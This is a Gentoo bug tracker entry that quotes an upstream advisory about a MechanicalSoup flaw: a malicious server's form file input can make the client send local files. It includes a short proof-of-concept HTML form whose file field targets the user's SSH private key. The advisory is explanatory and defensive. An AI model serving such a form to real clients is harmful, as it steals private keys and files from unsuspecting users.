| Summary: | <dev-python/MechanicalSoup-1.3.0: Malicious web server can read arbitrary files on client using file input inside HTML form | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Michał Górny <mgorny> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | IN_PROGRESS --- | ||
| Severity: | minor | CC: | python, williamh |
| Priority: | Normal | ||
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | https://github.com/MechanicalSoup/MechanicalSoup/security/advisories/GHSA-x456-3ccm-m6j4 | ||
| Whiteboard: | B4 [glsa?] | ||
| Package list: | Runtime testing required: | --- | |
Thanks! |
Cleanup done already. Summary ======= A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form. Details ======= […] The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like: <html><body> <form method="post" enctype="multipart/form-data"> <input type="text" name="greeting" value="hello" /> <input type="file" name="evil" value="/home/user/.ssh/id_rsa" /> </form> </body></html> then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.